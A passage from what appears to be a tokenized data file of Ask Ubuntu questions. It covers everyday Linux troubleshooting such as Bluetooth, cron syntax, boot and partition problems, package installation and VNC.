binterfacesubclass 1 radio frequency binterfaceprotocol 1 bluetooth iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0019 1x 25 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0019 1x 25 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 4 bnumendpoints 2 binterfaceclass 224 wireless binterfacesubclass 1 radio frequency binterfaceprotocol 1 bluetooth iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0021 1x 33 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0021 1x 33 bytes binterval 1 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 5 bnumendpoints 2 binterfaceclass 224 wireless binterfacesubclass 1 radio frequency binterfaceprotocol 1 bluetooth iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x83 ep 3 in bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0031 1x 49 bytes binterval 1 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x03 ep 3 out bmattributes 1 transfer type isochronous synch type none usage type data wmaxpacketsize 0x0031 1x 49 bytes binterval 1 the computer can connect to a wireless lan in windows as well as ubuntu . what do i need to do to get the bluetooth working ?
335365	reflect changes to file that .vimrc sources	here is my set-up . there is a ~/.vimrc that sources several files . i make changes to one of these . and i do : so ~/.vimrc , the changes in the underlying files are not reflected . i need to quit and restart vim . is there any way i can achieve this ? let me rephrase , knowing vim . how do i get the changes to reflect without restarting vim ?
335366	what does /path/to refer to in entering a cron job	i want to create a cron job which will run every 5 minutes . i have understood the concept of setting the condition of 'every five minutes ' from a previous answer on the same topic . however , i do not understand the part where it says /path/to command . i have the format for every 5 minutes as */5 * * * * and i have set root as the user . the job i want to be have run every 5 minutes is executed by the following command snmpbulkwalk -v 2c -c public -oxsq 172.16.1.210 \ .1.3.6.1.2.1.3.1.1.2 > /tmp/s01_arp.txt how can i add this cron job properly
335372	could n't find any package by regex libstdc++.so.5 libexpat.so.0 in 32-bit ubuntu 12.04	while installing a software wink , i got stdc++ and lib expat packages not found . prayag @ prayag : ~/wink $ ./installer.sh wink requires that the following packages be installed to run properly . please install them and try again . libstdc++.so.5 libexpat.so.0 then i tried installing above packages via apt-get , but am getting prayag @ prayag : ~/wink $ sudo apt-get install libstdc++.so.5 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libstdc++.so.5 e : could n't find any package by regex 'libstdc++.so.5' prayag @ prayag : ~/wink $ sudo apt-get install libexpat.so.0 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libexpat.so.0 e : could n't find any package by regex 'libexpat.so.0' how can i get them in 32-bit ubuntu and make the wink installation move on . update : as suggested by @ salem , i did prayag @ prayag : ~/wink $ sudo apt-get install apt-file prayag @ prayag : ~/wink $ apt-file update # # libstdc++ prayag @ prayag : ~/wink $ apt-file search libstdc++.so.5 libstdc++5 : /usr/lib/i386-linux-gnu/libstdc++.so.5 libstdc++5 : /usr/lib/i386-linux-gnu/libstdc++.so.5.0.7 prayag @ prayag : ~/wink $ sudo apt-get install libstdc++5 similarly i installed libexpat1 and libexpat1-dev . prayag @ prayag : ~/wink $ apt-file search libexpat.so lib64expat1 : /usr/lib64/libexpat.so.1 lib64expat1 : /usr/lib64/libexpat.so.1.5.2 lib64expat1-dev : /usr/lib64/libexpat.so libexpat1 : /lib/i386-linux-gnu/libexpat.so.1 libexpat1 : /lib/i386-linux-gnu/libexpat.so.1.5.2 libexpat1-dev : /usr/lib/i386-linux-gnu/libexpat.so prayag @ prayag : ~/wink $ sudo apt-get install libexpat1 prayag @ prayag : ~/wink $ sudo apt-get install libexpat1-dev still wink installer telling me : prayag @ prayag : ~/wink $ ./installer.sh wink requires that the following packages be installed to run properly . please install them and try again . libexpat.so.0
335377	how do i boot to windows 8 from ubuntu 13.04 on a dual-boot efi install ? ( no grub )	so i just got a brand new dell xps 13 which comes preinstalled with windows 8 pro . i decided to install ubuntu 13.04 and dual-boot . i made a bootable usb , booted up the ubuntu installer and found that it did n't recognise my windows 8 os to install `` alongside '' , so i realised i would need to make my partitions manually . i went back into windows and used the disk manager to shrink my c drive by 100gb . there were about 5 other partitions like efi and stuff that i ignored . then , back to the ubuntu installer , made a primary partition of ext4 and a 20gb swap partition . i finished the installer , and ubuntu works great ! now my problem . i have no way of booting windows . every time i start the machine , it goes straight into ubuntu . i have tried holding down shift , but don '' t see any grub screen . ubuntu works great , but how do i boot to windows ? ? ?
335388	unity quicklists make the pointer busy in my application	lets say that i have an argument in my application ( for example appname -- something ) that does n't show the gui of the program , instead it does something in the background and closes after it finishes . if the exec of that unity quicklist action is with that command , and you click on it , the pointer will be busy for about 10 seconds , but the program has closed from 0.5 second what can i do ? i tried showing an empty dialog and then instant closing it , but it did n't fixed anything ... maybe the problem was the part that i am not showing a gui , but it wasn't..
335393	how to install bind dns server and apache web server in ubuntu ?	hello everyone i 'm new to this ask ubuntu can anyone guide me on how to install bind and apache in ubuntu ? i 'm new to ubuntu since i 'm using windows , i need this to complete my project in linux .
335401	how to change partitions on ubuntu virtual machine ?	original question : how to resize root partition without live cd ? i have a virtual machine that i need to make bigger . i made the vm img larger and now i need to resize the partitions so i can use the extra space . this is my current partition table and the goal is to combine /dev/vda1 and /dev/vda2 . vda1 is my current root partition vda2 is an extended partition that contains vda5 ( swap ) device boot start end blocks id system /dev/vda1 * 2048 18874367 9436160 83 linux /dev/vda2 18876414 20969471 1046529 5 extended /dev/vda5 18876416 20969471 1046528 82 linux swap / solaris this would be simple with gparted and a live cd , but i can only ssh to the server , or open it in virt-manager but it is still command line only . how can i possibly resize the root partition ? the vm is ubuntu server 12.04 .
335404	is there a way to lock a specific application , in ubuntu , with 'sudo ' method	for instance , if i needed to lock firefox , and whenever someone needs to access it ( under the same username as mine ) the usual sudo password prompt should appear . i have disabled password prompt by default under visudo by giving my username 'nopasswd ' privilege .
335408	how to make cflags work with the dash shell ?	my impression is that while setting the cflags variable is effective when bash is the default shell , it does n't make an effect with dash ( the debian almquist shell ) . first of all please correct me if my observation is wrong . secondly ( if my observation is right ) , how can i get a global cflags variable effectively go through dash ? i 've set the variable in ~/.profile like this : export cflags=-march=native
335409	chrome randomly opening new blank tabs	starting a few weeks ago , chrome has started randomly opening new blank tabs . it happens mostly when i open an application from the dash , but not every time . i 've tried removing chrome and re-installing and clearing all my cookies from chrome . i have n't figured out any other patterns to this , but it 's pretty annoying . has anyone else seen this and might know a fix ?
335418	dpkg was interrupted , you must manually run 'dpkg-configure-a ' to correct the problem	i was updating from 11.04 to 12.04 and i got this message : dpkg was interrupted , you must manually run 'dpkg-configure-a ' to correct the problem now i ca n't connect to the net nor can i use a cursor on my laptop ?
335429	problems with installation from ppa : ondrej	the server is running lucid and i am trying to upgrade the php to 5.5 stable . i followed the intructions on this question : how do i install latest php in supported ubuntu versions ( like 5.4.x in ubuntu 12.04 ) ? root @ 32772-201711 : ~ # add-apt-repository ppa : ondrej/php5 gpg : keyring `/tmp/tmpzcjhpd/secring.gpg ' created gpg : keyring `/tmp/tmpzcjhpd/pubring.gpg ' created gpg : requesting key e5267a6c from hkp server keyserver.ubuntu.com gpg : /tmp/tmpzcjhpd/trustdb.gpg : trustdb created gpg : key e5267a6c : public key `` launchpad ppa for ondåej surã½ '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok then i ran apt-get update followed by apt-get upgrade , and just for overkill , i ran apt-get dist-upgrade . these last 2 commands both state that my system is up to date . however , when i execute php -v , i still see 5.3.2-1ubuntu4.20 . my php is not upgrading to php5.5 as expected what am i missing in order to upgrade the php to the version offered by the ppa ?
335430	sdl not available on ubuntu	when i execute the following code , the app can going to finish . but sdl background window is not visible . it is shadow screen only . sdl1.2.15 used . # include < sdl/sdl.h > # include < iostream > using namespace std ; int main ( int argc , char* args [ ] ) { //声明表面 sdl_surface* hello = null ; sdl_surface* screen = null ; //启动sdl int ret = sdl_init ( sdl_init_video ) ; //设置窗口 screen = sdl_setvideomode ( 1366 , 768 , 0 , sdl_swsurface ) ; if ( ! screen ) cout < < sdl_geterror ( ) < < endl ; sdl_wm_setcaption ( `` window test '' , null ) ; //加载图像 hello = sdl_loadbmp ( `` hello.bmp '' ) ; if ( ! hello ) cout < < sdl_geterror ( ) < < endl ; //将图像应用到窗口上 sdl_blitsurface ( hello , null , screen , null ) ; //更新窗口 sdl_flip ( screen ) ; //释放已加载的图像 sdl_freesurface ( hello ) ; //暂停 sdl_delay ( 4000 ) ; //退出sdl sdl_quit ( ) ; return 0 ; } what 's happened ? help !
335431	does evolution have 'zoom text ' feature ?	does evolution email client have the ability to zoom in and out of the text in both the reader panel and the composer window ? i can only find this ability when you open an email in its own window - but not found in any other part of evolution ! here , and in thunderbird ( and outlook for that matter ) , you can click either ctrl++ or ctrl+- to zoom in or out , and the big one is scrolling back and forth with the mouse wheel while holding the ctrl key to zoom in and out . any thoughts on why its not available in the rest of the windows ?
335433	why the sudo donot need password in the rc.local ?	i have added sh /home/victor/startupap.sh into /etc/rc.local and the startupap.sh contains statement which need sudo , $ cat startupap.sh # ! /bin/bash sudo hostapd -b /etc/hostapd/hostapd.conf 2 > & 1 > /home/victor/startupap.log # sudo ifconfig wlan1 192.168.0.1 netmask 255.255.255.0 ; sudo dhcpd wlan1 -pf /var/run/dhcp-server/dhcpd.pid ; sudo bash -c `` echo 1 > /proc/sys/net/ipv4/ip_forward '' ; sudo iptables -t nat -a postrouting -o eth0 -j masquerade sudo ifconfig wlan1 192.168.0.1 netmask 255.255.255.0 2 > & 1 > > /home/victor/startupap.log sudo dhcpd wlan1 -pf /var/run/dhcp-server/dhcpd.pid 2 > & 1 > > /home/victor/startupap.log sudo bash -c `` echo 1 > /proc/sys/net/ipv4/ip_forward '' 2 > & 1 > > /home/victor/startupap.log sudo iptables -t nat -a postrouting -o eth0 -j masquerade 2 > & 1 > > /home/victor/startupap.log if i run this script in the terminal , it needs password , $ sudo ./startupap.sh [ sudo ] password for victor : but if i reboot ubuntu , this script ran and worked as expected without password , why ?
335434	is a ftp server what i need ?	i 've read this tutorial on installing ftp server : http : //www.wikihow.com/set-up-an-ftp-server-in-ubuntu-linux but i do n't know if it will fulfill my expectations , i 'm running ubuntu with xampp , i configured everything and i have a dynamic dns to my computer , so basically i have a website run from my home computer . i work with dreamweaver on another computer and i want to make ubuntu , on my home computer , an ftp server , so when i push dreamweaver 's upload button it will update the files on the home computer , is ftp server the best option for me and will it accomplish what i need ?
335441	/boot/efi ca n't be mounted after kernel update ubuntu 13.04	after installing the latest updates it appears that the new version of the kernel which was installed ( 3.8.0-29 ) will not boot properly . whenever i try to boot using this new kernel , i get an error message indicating that there was an error mounting /boot/efi . this only happens with this new kernel , as starting up with the older kernel versions works fine . in case this helps , i have a laptop with uefi , and i dual boot ubuntu 13.04 and windows 8 . edit : i tried everything in rod smith 's answer but i am still having the issue the exact error message is : an error occurred while mounting /boot/efi . press s to skip mounting or m for manual recovery pressing s just brings me to a terminal login screen , while pressing m brings me to a recovery terminal . here are the the results of the commands you asked me to run : $ grep efi /etc/fstab # /boot/efi was on /dev/sda2 during installation uuid=f433-df4c /boot/efi vfat defaults 0 1 $ sudo blkid /dev/sda1 : label= '' winre_drv '' uuid= '' 4a46311e46310c67 '' type= '' ntfs '' /dev/sda2 : label= '' system_drv '' uuid= '' f433-df4c '' type= '' vfat '' /dev/sda3 : label= '' lrs_esp '' uuid= '' 5034-7fb2 '' type= '' vfat '' /dev/sda5 : label= '' windows8_os '' uuid= '' 989e38469e381f66 '' type= '' ntfs '' /dev/sda6 : label= '' lenovo '' uuid= '' 32ee3b04ee3ac041 '' type= '' ntfs '' /dev/sda7 : label= '' pbr_drv '' uuid= '' 14243c89243c703a '' type= '' ntfs '' /dev/sda8 : uuid= '' b5377bd7-1953-4cb0-b30d-9ee5a466760c '' type= '' ext4 '' /dev/sda9 : uuid= '' be7e2af0-3cc7-4e3c-82a1-e28e3d4b4ba6 '' type= '' swap '' /dev/sdb1 : label= '' cruzer '' uuid= '' 28a2-35de '' type= '' vfat '' while /dev/sda2 and /dev/sda3 both look similar on my system /dev/sda2 is the one with the `` boot '' flag , and changing the entry in fstab to the uuid for /dev/sda3 made no difference .
335443	how to install tp-link tl-wr841nd router	i bought a tp-link tl-wr841nd router , but it is n't supported by linux . can someone help me to install it in ubuntu 12.04 ?
335447	is openstack swift required for juju integration ?	for juju integration with openstack , is swift object store a requirement ? i have a private setup with nova-compute , nova-network , keystone and glance . but do n't have swift . exact question had been asked previously , but it 's not clear if integration is possible without swift . is swift object storage a requirement ?
335450	dell unified linux driver installer	i 'm trying to set up a dell b1160w printer and am having trouble . i 'm using the a00 unified linux driver which i can get running but then is says sane - scanner api is needed . i have sane 1.0.23 installed . when i do `` instal anyway '' if seems like the printer is installed but it does nothing when i try to print anything ( meaning it goes to the print queue , looks like it 's about the print the just goes to idle and nothing happens ) anyone had this problem or have any ides on how to fix it ?
335451	vnc unity side/top bars missing	while i know related questions have been asked before , i have not found a satisfactory answer , especially not for versions of unity > = 13.04 . when logging in remotely through vnc , unity side/top bar missing . using vnc4server ubuntu 13.10 contents of ~/.vnc/xstartup : # ! /bin/sh # uncomment the following two lines for normal desktop : # unset session_manager # exec /etc/x11/xinit/xinitrc [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & x-window-manager & gnome-session & # -- session=ubuntu ( enabling this does not help ) contents of /usr/share/gnome-session/sessions : gnome.session ubuntu.session i also notice that if i start another tty and type startx , i get the same result ( deleting ~/.xauthority does not help ) .
335454	developer resources for desktop apps ?	on developer.ubuntu.com most resources seems to be targeted to ubuntu touch . if i wanted to write an ubuntu desktop application , where can i start ? is the ubuntu sdk for the desktop too ? i read that actually is more targeted to mobile apps . given that the ubuntu sdk is not yet ready for desktop , i 'm searching for the avalaible options for developing desktop apps on ubuntu highlighting the strength and the weakness of each solution .
335457	how to uninstall openjdk ?	i do n't want openjdk installed on my ubuntu 13.04 system , but trying to uninstall the openjdk-7-jre yields the following message : $ sudo apt-get purge openjdk-7-jre reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : gcj-4.7-base gcj-4.7-jre gcj-4.7-jre-headless gcj-4.7-jre-lib gcj-jre gcj-jre-headless icedtea-6-jre-cacao icedtea-6-jre-jamvm libgcj-common libgcj13 libgcj13-awt openjdk-6-jre-headless openjdk-6-jre-lib suggested packages : fastjar gcj-4.7-jdk gcj-jdk libgcj13-dbg sun-java6-fonts fonts-ipafont-gothic fonts-ipafont-mincho ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following packages will be removed : default-jre* icedtea-7-plugin* icedtea-netx* icedtea-plugin* libatk-wrapper-java* libatk-wrapper-java-jni* openjdk-7-jre* the following new packages will be installed : gcj-4.7-base gcj-4.7-jre gcj-4.7-jre-headless gcj-4.7-jre-lib gcj-jre gcj-jre-headless icedtea-6-jre-cacao icedtea-6-jre-jamvm libgcj-common libgcj13 libgcj13-awt openjdk-6-jre-headless openjdk-6-jre-lib 0 upgraded , 13 newly installed , 7 to remove and 4 not upgraded . need to get 57,0 mb/57,2 mb of archives . after this operation , 156 mb of additional disk space will be used . do you want to continue [ y/n ] ? what do i need to do so that no new packages , of which i need none , will be installed when removing openjdk-7 ?
335467	unity launcher .desktop icon	i 've installed eclipse from the ubuntu software center and things are working as expected apart from one little thing , the icon in the unity launcher . as you can see from the image below the icon is the default one and it should be the one shown on the desktop as this is the one i prefer . i 've done an updatedb , located all eclipse.png files and replaced them with the new one and still the default icon shows . is there some kind of cache that the launcher uses ? thanks in advance . http : //postimg.org/image/bmopwxnal/
335468	save new files to ubuntu one from ipad apps	on my ipad i have various apps , that can create new files . but i ca n't find a way to save this new file to ubuntuone . is there anything , that i missed ? thanks , armin
335473	remove metadata from libreoffice writer documents	is there any official program in ubuntu software center or some official tool that can remove metadata from documents ( generally libreoffice writer , pdf and if it 's possible images ) ?
335475	home encryption	i have just installed fresh 13.04 . i 've chosen to encrypt the entire installation , but the installer later asked me whether i wanted to encrypt personal folder under /home . what should i choose ?
335478	laptop monitor turns off when external monitors plugged in	just a heads up , i 'm brand new to ubuntu and linux as a whole , so go easy on me . i just installed ubuntu 13.04 on my thinkpad t430 . a few bumps along the way , but i 'm learning this new system quickly . i have two external monitors plugged in through the dock i have for the laptop , plus a usb-to-dvi adapter that is functioning properly . however , when i dock my laptop , the laptop monitor itself shuts off and i only get the 3 external . i 'd like to have all four monitors working at once . when i go into display under system settings , and turn on the laptop monitor , i get a timeout error . normally i would say this is a video card problem , but last week i was running 12.04 and everything was working properly . i did clean reinstall . hopefully you guys can help me out , thanks ! edit : super + p and/or fn + f7 ( monitor hotkey ) cycles between the following : laptop monitor only mirrored on external monitors ( laptop monitor is off ) 3 external monitors extended view ( laptop monitor is off ) in additional drivers , it only says `` no proprietary drivers in use '' . there are no options in the window to choose any different drivers , and there are none listed .
335480	wireless mouse stop working for few sec	i 'm using ubuntu 13.04 and my logitech m510 wireless mouse stop working for few sec after not moving it for few sec . i changed the batteries for new one but the issue is still present . i 'm using it on my laptop since playing minecraft with a touch pad is not recommended . if i keep moving the mouse around , it will work , but it is only when i stop touching it for like 3 seconds that it freeze for 1 or 2 seconds , even more sometime . what can i do to solve this issue ? thanks .
335481	can not use gedit on multiple remote machines using ssh	after setting up the last of my 5 remote machines , i decided to test that the network was working well by connecting to each and opening gedit . to my dismay , when i tried to open gedit on the second machine , i was greeted with : ** ( gedit:1862 ) : warning ** ; could not connect : connection refused ** ( gedit:1862 ) : warning ** ; could not connect to session bus closing gedit did n't help , but when i closed my ssh connection to the first remote machine , i was able to open gedit on the second . i decided to check if this was a problem with all x programs , but i was able to open xeyes on multiple remote machines . my question is , why does remotely opening gedit on one machine prevent me from opening it on another until the first ssh session is closed ? and is there a way to fix this or a workaround ? i do n't need to have multiple gedits open at once , but i 'd least like to be able to not have to close the connection to one of the machines before i can open it on another . my ssh_config is set up with 'forwardx11 ' and 'forwardx11trusted ' both set to yes , in case this is pertinent . update : i decided to try a few more programs , and found that while i can have nautilus open through ssh on multiple machines , i get a number of the connection refused warnings before it opens .
335483	low graphics mode error on 13.04	background i have a dell inspiron 15r se . step by step , i wanted to upgrade the system from 11.10 to 13.04 . up to 12.10 everything was alright , it was working very well , problem when i did sudo do-release-upgrade from 12.10 to 13.04 , after the upgrade unity was not working , i had only desktop visible , no menu on top or left ( i am not sure how they are called ) . i had exactly this . what i tried of course i tried resetting unity , enabling unity plugin in compiz , etc , but nothing worked . at this moment i do n't really remember what i have done ( i tried many different things like until 2 am in the night , i ca n't recall all ) and now what i get is the `` low graphics mode '' just like in here . my graphics card is ati , so i tried the solution offered here , and absolutely nothing changed . i also tried installing linux-headers-generic , also linux-headers-'uname -r ' , adding a symbolic link for version.h ( because it was n't there , i did something like that ) but none of them worked . starting using one of the old kernels ( selecting them from grub ) does not work either , each one of them also go into low graphics mode . here is the output from my /var/log/xorg.0.log any help is appreciated !
335485	on conncting to citrix vpn internet disconnects	i use citrix vpn to connect to my client 's network . once if i connect to the vpn , i 'm not able to access internet . i use cisco vpn through network manager , where it allowed me to configure to access internet while connected to vpn . but with citrix , i had to use commandline line client provided . any help is much appreciated . i use ubuntu 13.04
335486	hdmi display suddenly not recognized anymore	i 'm having a critical issue on my production machine . until yesterday , i 've been working with my laptop connected to an external display through hdmi . now , when i switch the pc on , the display says `` no signal '' . if i book in windows7 , everything works . what can i do ? thanks a lot ! !
335487	vlc media player problem	so the controls of vlc are gone and so is the menu in the upper corner of the screen . i already reinstalled it two times : once with the ubuntu software center and it did n't work , so i tried with terminal with these commands : sudo apt-get purge vlc vlc-nox sudo apt-get install vlc this way did n't work too . i am currently on ubuntu 13.04 ( 64 bit version ) with the proprietary nvidia driver 313 , the system is also dual-boot with windows . this whole thing happened today after update of the os , as far as i know there was no problem yesterday , it must have been from the update i think . the player itself is working ( playing movies , rewind , pause ) , but as mentioned the menus and controls are n't displaying , as well as the context menu when right clicking .
335488	how to find out which backported packages are available , and avoid losing packages when manually upgrading ?	i was surprised to see that since natty 11.04 , even when we have enabled a backports repository , updated packages are n't automatically installed from that repository . we have to install individual updates manually , e.g . via apt-get install ipython/precise-backports as explained at ubuntubackports - community ubuntu documentation . i guess i just did n't get the memo ... . first question : how do we find out what our options are for upgrades via backports ? i 'm surprised that even if i ask for status , e.g . via wajig status ipython it does n't tell me there is a new version available . i 'd like a list of all upgrades for packages which i 've already installed . next , how do i avoid losing existing packages just because i upgrade via a backport ? e.g . the above ipython install tells me : the following packages will be removed : ipython-notebook ipython-qtconsole how do i say i want the latest backported ipython , as well as any other packages for which updates are available that depend on it , without manually figuring them all out and installing them also ? i know i can change the pinning so that i get all updates , but i 'm hesitant to go against the general advice not to . but if a user asks for one package to be updated , would n't it be natural to update all the dependencies , like you 'd get from a ppa ?
335489	is there a way to define a hotkey to solely unhide the launcher ?	i 'm running ubuntu on parallels desktop for mac , where i have some limitations regarding usage of the super key ( and also problems with mouse edge detection ) , for example , i 've read on the web that holding super for a while should bring a list of hotkeys , but for me holding it does nothing and on release just shows the launcher with the dash open and focused . hitting super does the same , unhide launcher with dash focused . hitting super + w and holding super i have the launcher unhidden with the icons being numbered for shortcut access . what i 'd like to have is just a hotkey , like there 's for unhiding launcher with dash focused , but without the dash focus , i 'd like to have the launcher unhidden as if the mouse was close to it , and if possible , kept it unhidden after hitting the hotkey until the hotkey got clicked again , which is the behavior of launcher accompanied by dash currently . note that i 'm not looking for a solution that would enable/disable auto-hide to pretend that the launcher is being unhidden . this approach causes undesirable effects , the launcher does n't unhide , it just pops up suddenly , and occupies space , forcing rearrangement of icons in the desktop . edit i 've tried other distros , like elementaryos , and it does n't present any issue with mouse edge detection for unhiding the dock inside a parallels vm ... sadly this seems like an ubuntu/unity specific issue .
335491	kernel upgrade 3.5.0-39-generic prevents virtual box from running	i just performed the kernel upgrade as part of the regular system upgrade . as usually on previous kernel upgrades , i had to install the kernel headers and recompile virtualbox drivers . this process worked normally and virtualbox is able to launch , but it stalls trying to run the virtual machine . when i backup to 3.5.0-37 ( using grub menu , and recompile virtualbox drivers ) it returns to working state . the version string from uname -a after upgrading is 3.5.0-39-generic # 60-ubuntu smp tue aug 13 18:33:05 utc 2013 x86_64 x86_64 x86_64 gnu/linux and my system is a lenovo laptop w520 that has been running ubuntu/virtualbox for a couple of years already . is there anyone experiencing this issue and found a solution ?
335492	why does mounting proc in my chroot fail during debootstrapping ?	in a cleanly installed ubuntu raring machine i am trying to perform a debootstrap of another system . here 's the exact command : http_proxy=http : //192.168.122.1:8000/ debootstrap -- arch=amd64 raring /mnt/virtfs-test/ it runs fine , but almost at the end it failed : [ ... ] i : extracting zlib1g ... w : failure trying to run : chroot /mnt/virtfs-test mount -t proc proc /proc w : see /mnt/virtfs-test/debootstrap/debootstrap.log for details the log file shows only this : gpgv : signature made thu apr 25 13:54:39 2013 cest using dsa key id 437d05b5 gpgv : good signature from `` ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > '' gpgv : signature made thu apr 25 13:54:39 2013 cest using rsa key id c0b21f32 gpgv : good signature from `` ubuntu archive automatic signing key ( 2012 ) < ftpmaster @ ubuntu.com > '' chroot : failed to run command 'mount ' : permission denied that made me curious on why this would fail . i noticed i could n't even chroot into there : chroot /mnt/virtfs-test chroot : failed to run command â/bin/bashâ : permission denied that led me to this serverfault q & a and i made this interesting discovery : # ls -al /mnt/virtfs-test/lib64/ total 8 drwxr-xr-x 2 root root 4096 aug 21 20:02 . drwxr-xr-x 20 root root 4096 feb 7 2013 .. -- -- -- -- -- 1 root 123 0 aug 21 20:02 ld-linux-x86-64.so.2 what ? the file is not a link , it is empty and does not have any permission set ? this makes no sense . so i linked the file as in the sf q & a : ln -s /lib/x86_64-linux-gnu/ld-2.17.so /mnt/virtfs-test/lib64/ld-linux-x86-64.so.2 now i can chroot : # chroot /mnt/virtfs-test groups : can not find name for group id 0 i have no name ! @ mymachine : / # however , i am still curious as to why debootstrap failed . i am using debootstrap version 1.0.46ubuntu1 which is the fully updated version in ubuntu raring . i am unable to find any bugreport regarding this . does anybody have a clue ? notes : i performed all commands being fully root ( sudo -i ) . the filesystem i try to debootstrap onto is type 9p ( virtfs , inside a ubuntu kvm virtual machine ) . i am not seeing any messages on the host machine after enabling this in the apparmor profile ( /etc/apparmor.d/abstractions/libvirt-qemu on the host ) : /mnt/vms/virtfs-test/ rwl , /mnt/vms/virtfs-test/** rwl ,
335495	markdow to pdf with wordwrapping	using pandoc like : pandoc -o output.pdf input.md does not give me a result with word-wrapping . for instance , three liner input.md looks like the following : # introduction lorem ipsum dolor sit amet , scelerisque natoque , in etiam erat nibh lacus , porta quam penatibus , at metus , purus leo est . sed faucibus odio in amet , in sapien ut sapien eu , vehicula pede vel pellentesque , ut hac lacinia mauris ridiculus rhoncus ligula . sit congue , ac montes , lorem ligula etiam ac fusce ipsum , lacus dolor in suscipit aliquet vitae . blandit neque aliquam , amet vel , ante nullam neque . adipiscing nullam , neque elit , nunc non mauris libero vivamus tortor . running the above command yields a pdf document with some content as the following : introduction lorem ipsum dolor sit amet , scelerisque natoque , in etiam erat nibh lacus , is there a fast way of converting a markdown ( .md ) file to pdf with word-wrapping ( similar to the way done in here ) ?
335496	can not boot from usb and grub ! ubuntu 12.10	i have an hp probook 5330m with ssd , without cd , and windows 7 . i also installed ubuntu 12.10 and have been dual booting for many months now . something went wrong and now i ca n't boot my laptop at all ! the error message is error : invalid arch independent elf magic . grub rescue > another problem is that i can not boot from usb ! i tried to create usb startup disks - ubuntu live cd , supergrub , ... but when i configure the usb as first boot sequence , i get the error : remove disks or other media . press any key to restart so , i 'm really stuck . any suggestions ? how can i recover my system with the grub rescue shell ?
335504	can i install ubuntu 13.04 on a samsung np355v5c ( windows 8 preinstalled ) laptop ?	i heard that installing ubuntu on some samsung laptops with a preinstalled windows 8 and a uefi bios can crash them . i want to install ubuntu 13.04 on my samsung np355v5c , but i 'm not sure if it will crash my laptop too , so i wanted to ask here , just to be sure . thank you : )
335505	qml app icon not effective when called from app.setwindowicon ( )	i 've a qt5/qml hybrid app built with ubuntu touch sdk . i 'm trying to set the app icon for it , but without success . code looks like this : int main ( int argc , char *argv [ ] ) { qapplication app ( argc , argv ) ; ... qtquick2applicationviewer viewer ; // is this part of the problem perhaps ? viewer.setmainqmlfile ( ... ) ; // works and i see my page ... app.setwindowicon ( qicon : : ( `` ./localfilepath.svg '' ) ; ... return app.exec ( ) ; } it clearly looks for the svg ( changing the path generates an error ) , but this does n't change the icon used when i press alt + tab , or look at the side bar icon ( a ? icon ) . what am i doing wrong ?
335506	managing multiple sound cards in kubuntu - more reliable way than kde phonon gui ?	i have two sound cards attached to my pc - an internal soundblaster and an external dac . unfortunately , managing what to output where is a real pain . just to give an example : when i enter the phonon interface and set the dac as the preferred device for all categories and then start dragon player , a message pops up saying `` reverting to soundblaster because it has higher priority '' ( even though it obviously does not ) . also , it 's really inflexible . the kde mixer even has an option to adjust volume for individual programs using sound devices . i 'd like to have similar functionality to switch , e.g . amarok 's output to card a and chromium 's to card b . are there any tools which make this possible in kubuntu ? if all else fails - is the gnome way of handling this problem more flexible and configurable ?
335508	best way to have windows and ubuntu ?	my laptop : http : //www.toshibadirect.com/td/b2c/retail-product.jsp ? poid=433212 if there are n't any comparability or driver issues i 'm considering installing ubuntu . i think i still want windows for some games and for microsoft visual studio 2010 c++ . how should i do this tough ? my preferred method is obviously have my oem windows back , but the disc costs $ 20 and i ca n't find a torrent anywhere . should i install windows , create a 2nd partition , install ubuntu on 2nd partition ? should i install ubuntu and use wine for windows applications , or is my computer too old ? should i install ubuntu , create another partition , then install windows ? or maybe there 's a better way .
335511	view transmission status through cli	i have installed transmission , and i have added a torrent to it , now how will i be able to view the details of the torrents . i have tried transmission-remote on local system . m @ m-170 : /home/m/ $ transmission-remote -n transmission : transmission -st current session uploaded : none downloaded : none ratio : none duration : 1 hour , 31 minutes ( 5478 seconds ) total started 1 times uploaded : none downloaded : none ratio : none duration : 1 hour , 31 minutes ( 5478 seconds ) and when i view my transmission gui it is currently downloading how can i see the status , current download and upload speed and also add and remove torrents edit : i have check an my default username and password is transmission so when i go here http : //localhost:9091/ and type username and password , i see the web interface of the transmission , but i dont see the current downloading in the gui . is there a way in transmission command line , that i can check what is in my gui and its status of my torrents
